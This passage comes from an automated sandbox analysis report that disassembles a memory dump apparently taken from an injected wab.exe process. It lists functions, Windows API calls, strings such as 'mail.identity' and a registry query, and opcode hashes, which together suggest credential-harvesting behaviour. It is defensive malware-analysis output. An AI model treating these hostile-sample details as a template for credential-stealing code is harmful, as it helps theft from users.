                                                                                              • GetPrivateProfileStringA.KERNEL32(0045A550,0000000A,0044C52F,?,00001000,0045A448), ref: 004092E2
                                                                                              • _mbscpy.MSVCRT ref: 004092FC
                                                                                              Strings
                                                                                              • <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 004092A9
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: PrivateProfileString_mbscpymemset
                                                                                              • String ID: <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>
                                                                                              • API String ID: 408644273-3424043681
                                                                                              • Opcode ID: dda02bb9c94d4f17af39156b30a74aa4a90c932e0b7e9f3942217324440be20b
                                                                                              • Instruction ID: a8dcbc571cfa5336c44be942190f1d9429afcf202dd246abef1f156f809eb6de
                                                                                              • Opcode Fuzzy Hash: dda02bb9c94d4f17af39156b30a74aa4a90c932e0b7e9f3942217324440be20b
                                                                                              • Instruction Fuzzy Hash: 02F0E0725011A83AEB1297549C02FCA779CCB0D307F1440A2B749E20C1D5F8DEC44A9D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00407482 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 35COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: _mbscpy
                                                                                              • String ID: C^@$X$ini
                                                                                              • API String ID: 714388716-917056472
                                                                                              • Opcode ID: d9dcd15f5501d6044b59d83579e7760d9dc142544ad26eb0a5a2565b401737d3
                                                                                              • Instruction ID: 848b4a5d233ab05c703a0d630411b91f0640a461eb42b4d170138ac17b774cf5
                                                                                              • Opcode Fuzzy Hash: d9dcd15f5501d6044b59d83579e7760d9dc142544ad26eb0a5a2565b401737d3
                                                                                              • Instruction Fuzzy Hash: F601B2B1D002489FDB50DFE9D9856CEBFF4AB08318F10802AE415F6240EB7895458F59
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00401000 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00406FC7: memset.MSVCRT ref: 00406FD1
                                                                                                • Part of subcall function 00406FC7: _mbscpy.MSVCRT ref: 00407011
                                                                                              • CreateFontIndirectA.GDI32(?), ref: 0040101F
                                                                                              • SendDlgItemMessageA.USER32(?,000003EC,00000030,00000000,00000000), ref: 0040103E
                                                                                              • SendDlgItemMessageA.USER32(?,000003EE,00000030,?,00000000), ref: 0040105B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: ItemMessageSend$CreateFontIndirect_mbscpymemset
                                                                                              • String ID: MS Sans Serif
                                                                                              • API String ID: 3492281209-168460110
                                                                                              • Opcode ID: d4e5890e55cd272a0cdfb621d5336f544a59e77ca07302a9ad9f735f222c5d17
                                                                                              • Instruction ID: 97d77737ff66efe52178e6fda6de2dc92fca71035f8b3f8e7b76904d62d162b3
                                                                                              • Opcode Fuzzy Hash: d4e5890e55cd272a0cdfb621d5336f544a59e77ca07302a9ad9f735f222c5d17
                                                                                              • Instruction Fuzzy Hash: F5F02775A4130477E7317BA0EC47F4A3BACAB41B00F044535F652B50E1D2F4A404CB48
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00407107 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 29COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: ClassName_strcmpimemset
                                                                                              • String ID: edit
                                                                                              • API String ID: 275601554-2167791130
                                                                                              • Opcode ID: bf6c2209122d7ccd6bf6d4d5b504d0ca7740a040d867409a121181f8c875a0cc
                                                                                              • Instruction ID: 4378e7120b76b93f9ba7f3ad81c4d59275eb15acd3879ac3f183c71196eabbb1
                                                                                              • Opcode Fuzzy Hash: bf6c2209122d7ccd6bf6d4d5b504d0ca7740a040d867409a121181f8c875a0cc
                                                                                              • Instruction Fuzzy Hash: ADE09BB2C4016A6AEB21A664DC01FE5776CDF59704F0400B6B945E2081E6A4A6884A95
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040759E Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20stringCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: strlen$_mbscat
                                                                                              • String ID: 3CD
                                                                                              • API String ID: 3951308622-1938365332
                                                                                              • Opcode ID: d1143cf22a6afbd37b374b0806e036797619bbf072935b8337c8bafa4bdf7e65
                                                                                              • Instruction ID: 1107c6f19d6a4433d5fdc1d3c5cfb72f3531f1d81a70b052f8a244d3c085287a
                                                                                              • Opcode Fuzzy Hash: d1143cf22a6afbd37b374b0806e036797619bbf072935b8337c8bafa4bdf7e65
                                                                                              • Instruction Fuzzy Hash: 1BD0A77390C2603AE61566167C42F8E5BC1CFD433AB15081FF408D1281DA3DE881809D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004326AD Relevance: 6.5, APIs: 3, Strings: 1, Instructions: 475COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: memset
                                                                                              • String ID: rows deleted
                                                                                              • API String ID: 2221118986-571615504
                                                                                              • Opcode ID: b98c805d9f7a15f03bb69ae15e6c6b0a921ed9a197951f9464e59faa98c73a57
                                                                                              • Instruction ID: 17dfb349c3cd8fc2c2490db290532cf881f14abfa8d6012d9aa572d9710d7201
                                                                                              • Opcode Fuzzy Hash: b98c805d9f7a15f03bb69ae15e6c6b0a921ed9a197951f9464e59faa98c73a57
                                                                                              • Instruction Fuzzy Hash: D5028171E00218AFDF14DFA5D981AEEBBB5FF08314F14005AF914B7291D7B9AA41CBA4
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0044338B Relevance: 6.3, APIs: 5, Instructions: 81COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??2@$memset
                                                                                              • String ID:
                                                                                              • API String ID: 1860491036-0
                                                                                              • Opcode ID: ebb40f1ae782bd27a9c9ebb170ff663f9279e29e1a89e233aa61efeea33ca50f
                                                                                              • Instruction ID: bd2fcbe50e3d5b8ec1466eca70e60fda3411ba7e10a355e4f398212a99dd52d4
                                                                                              • Opcode Fuzzy Hash: ebb40f1ae782bd27a9c9ebb170ff663f9279e29e1a89e233aa61efeea33ca50f
                                                                                              • Instruction Fuzzy Hash: 973162B09107508FE751DF3A8845A16FBE4FF80B05F25486FD549CB2A2E779E5408B19
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00404888 Relevance: 6.3, APIs: 5, Instructions: 77COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: memset$memcpy
                                                                                              • String ID:
                                                                                              • API String ID: 368790112-0
                                                                                              • Opcode ID: e33439cddf26871f1b6b72d3f102fac71f305b2afc07238da9e6d18acb06c1a9
                                                                                              • Instruction ID: 0e4d5a8aef3e538851842ff93af65fc880b0f2046ec3e537946e92548d274f73
                                                                                              • Opcode Fuzzy Hash: e33439cddf26871f1b6b72d3f102fac71f305b2afc07238da9e6d18acb06c1a9
                                                                                              • Instruction Fuzzy Hash: BB2162B650115DABDF11EE68CD41EDE77ACDF95304F0040A6B708E3151D2749F448B64
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040D2A3 Relevance: 6.3, APIs: 5, Instructions: 50COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: memset$memcpy
                                                                                              • String ID:
                                                                                              • API String ID: 368790112-0
                                                                                              • Opcode ID: b4e43ced28bb4930618584d198fe59dd62a49c5b1c6a4db04c735ab4a5314c67
                                                                                              • Instruction ID: 358c417c53aa398974aae77e4359fd90ac0a4dba5340dfd55ca125e4bb0c9b0b
                                                                                              • Opcode Fuzzy Hash: b4e43ced28bb4930618584d198fe59dd62a49c5b1c6a4db04c735ab4a5314c67
                                                                                              • Instruction Fuzzy Hash: 8E01D8B5A40B406BE235AE25CC03F2AB3A8DF91714F400A2EF692676C1D7B8F509915D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004257AA Relevance: 6.2, APIs: 4, Instructions: 181COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __allrem.LIBCMT ref: 00425850
                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00425885
                                                                                              • __allrem.LIBCMT ref: 00425933
                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0042597B
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                              • String ID:
                                                                                              • API String ID: 1992179935-0
                                                                                              • Opcode ID: eeae426aa4a2dd52bce4edc8b714b0ba45551b1196620555c2276823dfb77c6c
                                                                                              • Instruction ID: 2fc5b562d87482ee0bf7138f77baf3e4365ffd42061eb2d4d5abd72185a9e376
                                                                                              • Opcode Fuzzy Hash: eeae426aa4a2dd52bce4edc8b714b0ba45551b1196620555c2276823dfb77c6c
                                                                                              • Instruction Fuzzy Hash: C96180B1A00A29DFCF149B64D840AAEB7B1FF45320F68815AE548AB391D7389D81CF19
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0042C52C Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 165COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              • too many SQL variables, xrefs: 0042C6FD
                                                                                              • variable number must be between ?1 and ?%d, xrefs: 0042C5C2
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: memset
                                                                                              • String ID: too many SQL variables$variable number must be between ?1 and ?%d
                                                                                              • API String ID: 2221118986-515162456
                                                                                              • Opcode ID: 60d5f5fef70a29d847aa1be0b0a9f40863d4de5ddd7e716af81dbeaf9fd2ce2b
                                                                                              • Instruction ID: 69d39437184f158b69242413db2932325e78deb4f0df02558d14bae7a1bb2b74
                                                                                              • Opcode Fuzzy Hash: 60d5f5fef70a29d847aa1be0b0a9f40863d4de5ddd7e716af81dbeaf9fd2ce2b
                                                                                              • Instruction Fuzzy Hash: 93518B31B00626EFDB29DF68D481BEEB7A4FF09304F50016BE811A7251D779AD51CB88
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00402624 Relevance: 6.1, APIs: 4, Instructions: 127COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000,?,?,00000400,00000001), ref: 004026E4
                                                                                              • memset.MSVCRT ref: 004026AD
                                                                                                • Part of subcall function 004108E5: UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410902
                                                                                                • Part of subcall function 004108E5: UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410923
                                                                                                • Part of subcall function 004108E5: memcpy.MSVCRT ref: 00410961
                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000002,?,0000007F,00000000,00000000,00000002,00000000,?), ref: 0040279C
                                                                                              • LocalFree.KERNEL32(?), ref: 004027A6
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: ByteCharFromMultiStringUuidWide$FreeLocalQueryValuememcpymemset
                                                                                              • String ID:
                                                                                              • API String ID: 1593657333-0
                                                                                              • Opcode ID: f86a270f64af7f2cfe52cb4533637fefaa5bfeff9622a9a4a07cc31b63cb9060
                                                                                              • Instruction ID: aa14e43d8b473801bf9d2631992dc1640396fa6537153de3cc175e43cdbeb3f4
                                                                                              • Opcode Fuzzy Hash: f86a270f64af7f2cfe52cb4533637fefaa5bfeff9622a9a4a07cc31b63cb9060
                                                                                              • Instruction Fuzzy Hash: 0B4183B1408384BFD711DB60CD85AAB77D8AF89314F044A3FF998A31C1D679DA44CB5A
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040C8B8 Relevance: 6.1, APIs: 4, Instructions: 115windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 0040C922
                                                                                              • SendMessageA.USER32(00000000,00000423,00000000,00000000), ref: 0040C966
                                                                                              • GetMenuStringA.USER32(?,00000103,?,0000004F,00000000), ref: 0040C980
                                                                                              • PostMessageA.USER32(?,00000402,00000000,00000000), ref: 0040CA23
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: Message$MenuPostSendStringmemset
                                                                                              • String ID:
                                                                                              • API String ID: 3798638045-0
                                                                                              • Opcode ID: baefdefab252ba5ebdbc5dbfb72098888a57285fb2abb1b9f47d437d3554fda2
                                                                                              • Instruction ID: 1bc0f942f430aed347c7303033341c470b8779a554354b53929018aa447f6f2a
                                                                                              • Opcode Fuzzy Hash: baefdefab252ba5ebdbc5dbfb72098888a57285fb2abb1b9f47d437d3554fda2
                                                                                              • Instruction Fuzzy Hash: A241D071600215EBCB24CF24C8C5B97B7A4BF05325F1483B6E958AB2D2C3789D81CBD8
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040B5E5 Relevance: 6.1, APIs: 4, Instructions: 114stringCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00409DED: ??2@YAPAXI@Z.MSVCRT ref: 00409E0E
                                                                                                • Part of subcall function 00409DED: ??3@YAXPAX@Z.MSVCRT ref: 00409ED5
                                                                                              • strlen.MSVCRT ref: 0040B60B
                                                                                              • atoi.MSVCRT ref: 0040B619
                                                                                              • _mbsicmp.MSVCRT ref: 0040B66C
                                                                                              • _mbsicmp.MSVCRT ref: 0040B67F
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: _mbsicmp$??2@??3@atoistrlen
                                                                                              • String ID:
                                                                                              • API String ID: 4107816708-0
                                                                                              • Opcode ID: 481fecb55ebe7fb47740a6b69fad8160bec1c4c1e9b6d2800cf49c311f8ba602
                                                                                              • Instruction ID: e44d10e2ba05df3f3c4ea20365ac2b40f6a529c5f902ff1350b2aa0f2f7d2ce1
                                                                                              • Opcode Fuzzy Hash: 481fecb55ebe7fb47740a6b69fad8160bec1c4c1e9b6d2800cf49c311f8ba602
                                                                                              • Instruction Fuzzy Hash: 3A413D35900204EFCF10DFA9C481AA9BBF4FF48348F1144BAE815AB392D739DA41CB99
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004113B2 Relevance: 6.1, APIs: 4, Instructions: 85stringCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@_gmtime64memcpystrftime
                                                                                              • String ID:
                                                                                              • API String ID: 1886415126-0
                                                                                              • Opcode ID: 2c8248469399fbf04d0dbf47d68c6bd2d8f4f823657728d056fdecfbecaff4db
                                                                                              • Instruction ID: 0fc2308174198aa020173da426f8fce31fb0284c5be342abf897f659f69a0370
                                                                                              • Opcode Fuzzy Hash: 2c8248469399fbf04d0dbf47d68c6bd2d8f4f823657728d056fdecfbecaff4db
                                                                                              • Instruction Fuzzy Hash: 6F21E472A013145BD320EB69C846B5BB7D8AF44734F044A1FFAA8D73D1D738E9448699
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00444462 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 84stringCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: strlen
                                                                                              • String ID: >$>$>
                                                                                              • API String ID: 39653677-3911187716
                                                                                              • Opcode ID: fe8035a2bc0feec0fd3c25fdeb621276a2bec91dd981480682d5a40b5cd82bd5
                                                                                              • Instruction ID: 00f684ae2741cafacb4c0f359147db44c9a3c2c025b4d94400920e38b4f60055
                                                                                              • Opcode Fuzzy Hash: fe8035a2bc0feec0fd3c25fdeb621276a2bec91dd981480682d5a40b5cd82bd5
                                                                                              • Instruction Fuzzy Hash: E131261180D6C4AEEB11CFA880463EEFFB05FA2304F5886DAD0D047743C67C964AC3AA
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040D205 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 67COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: memcpy
                                                                                              • String ID: @
                                                                                              • API String ID: 3510742995-2766056989
                                                                                              • Opcode ID: 5364360adcdec80b12010bd2de721da4a734fa53c949916e07c670fac02dc71b
                                                                                              • Instruction ID: 6d1199ef97cb2679a5b3fe4a4c98cea7b7ae300cfbacc21e3dff9814a3884c4c
                                                                                              • Opcode Fuzzy Hash: 5364360adcdec80b12010bd2de721da4a734fa53c949916e07c670fac02dc71b
                                                                                              • Instruction Fuzzy Hash: 41113DB2E007046BDB288E96DC80D5A77A8EFA0354700013FFE06662D1F639EA5DC7D8
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040796E Relevance: 6.1, APIs: 4, Instructions: 63stringCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • strlen.MSVCRT ref: 0040797A
                                                                                              • ??3@YAXPAX@Z.MSVCRT ref: 0040799A
                                                                                                • Part of subcall function 00406F30: malloc.MSVCRT ref: 00406F4C
                                                                                                • Part of subcall function 00406F30: memcpy.MSVCRT ref: 00406F64
                                                                                                • Part of subcall function 00406F30: ??3@YAXPAX@Z.MSVCRT ref: 00406F6D
                                                                                              • ??3@YAXPAX@Z.MSVCRT ref: 004079BD
                                                                                              • memcpy.MSVCRT ref: 004079DD
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??3@$memcpy$mallocstrlen
                                                                                              • String ID:
                                                                                              • API String ID: 1171893557-0
                                                                                              • Opcode ID: defd1bd1be5bbd5284309495682469d6dd103d7cb5d76ad0db5bff9d1363c284
                                                                                              • Instruction ID: 28856836b01dc1c1490a34e4127c9d88e875caa212a522c6554fbe506b42c8ef
                                                                                              • Opcode Fuzzy Hash: defd1bd1be5bbd5284309495682469d6dd103d7cb5d76ad0db5bff9d1363c284
                                                                                              • Instruction Fuzzy Hash: A211CDB1604600EFD720DF18D880E9AB7F5EF48328B108A2EE852A76D1C735F8158B59
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040E1C8 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 59COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: _strcmpi
                                                                                              • String ID: C@$mail.identity
                                                                                              • API String ID: 1439213657-721921413
                                                                                              • Opcode ID: 4271e50fa9e0cb48d23f84e20e6912c8f7ba64196effffc20a844cddd1a4c075
                                                                                              • Instruction ID: e081b0b03caa8c584547328dd3c7b46ba64ccdb110812537a35def5e1e6d8c92
                                                                                              • Opcode Fuzzy Hash: 4271e50fa9e0cb48d23f84e20e6912c8f7ba64196effffc20a844cddd1a4c075
                                                                                              • Instruction Fuzzy Hash: DD110A325002199BEB20AA65DC41E8A739CEF00358F10453FF545B6182EF38F9598B98
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00406620 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 50COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 00406640
                                                                                                • Part of subcall function 004063B2: memset.MSVCRT ref: 0040644F
                                                                                                • Part of subcall function 004063B2: memcpy.MSVCRT ref: 00406462
                                                                                                • Part of subcall function 004063B2: memcpy.MSVCRT ref: 00406475
                                                                                              • memcmp.MSVCRT ref: 00406672
                                                                                              • memcpy.MSVCRT ref: 00406695
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: memcpy$memset$memcmp
                                                                                              • String ID: Ul@
                                                                                              • API String ID: 270934217-715280498
                                                                                              • Opcode ID: ff49a6b21300bdc1e28d83de90f780c1e5e431fdc449c6fd399a747e7733bd1d
                                                                                              • Instruction ID: 50cfa42ee3f36d69bd2a91aaf20a03d2fa08f341615043147a7a382cdea3e611
                                                                                              • Opcode Fuzzy Hash: ff49a6b21300bdc1e28d83de90f780c1e5e431fdc449c6fd399a747e7733bd1d
                                                                                              • Instruction Fuzzy Hash: 46017572A0020C6BEB10DAA58C06FEF73ADAB44705F450436FE49F2181E679AA1987B5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040B903 Relevance: 6.0, APIs: 4, Instructions: 45windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408E7F
                                                                                                • Part of subcall function 00408DB6: memcpy.MSVCRT ref: 00408EBE
                                                                                              • sprintf.MSVCRT ref: 0040B929
                                                                                              • SendMessageA.USER32(?,00000401,00000000,?), ref: 0040B98C
                                                                                                • Part of subcall function 00408DB6: _mbscpy.MSVCRT ref: 00408E31
                                                                                                • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
                                                                                              • sprintf.MSVCRT ref: 0040B953
                                                                                              • _mbscat.MSVCRT ref: 0040B966
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: sprintf$LoadMessageSendString_mbscat_mbscpymemcpystrlen
                                                                                              • String ID:
                                                                                              • API String ID: 203655857-0
                                                                                              • Opcode ID: e7a96a4b3b60773b868b861c6ef1878d2d31708076d5e2e16fac633899c29946
                                                                                              • Instruction ID: 0d6227c2dffbdb2154d3321facad49e181a647ebd34d8d5e6c5aab0b846496ed
                                                                                              • Opcode Fuzzy Hash: e7a96a4b3b60773b868b861c6ef1878d2d31708076d5e2e16fac633899c29946
                                                                                              • Instruction Fuzzy Hash: EE0117B2500308A6E721EB75DC87FE773ACAB54704F04046AB659B61C3DA78E5444A59
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0044B33B Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??3@
                                                                                              • String ID:
                                                                                              • API String ID: 613200358-0
                                                                                              • Opcode ID: 95fe0c5ee96a68655d96064396ecbffa5b8939de9cee66978f58e17f988e32ec
                                                                                              • Instruction ID: 5841ab7dcc50b440abd9236b7832042a9d7d1d7b8957bb774bcacf87f05c1f29
                                                                                              • Opcode Fuzzy Hash: 95fe0c5ee96a68655d96064396ecbffa5b8939de9cee66978f58e17f988e32ec
                                                                                              • Instruction Fuzzy Hash: AAE046A134974456BA10AF7BAC52F13239CEA803523168C6FB800F36D2EF2CE890846C
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0041865B Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 243COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 004176F4: memcmp.MSVCRT ref: 004177B6
                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00418726
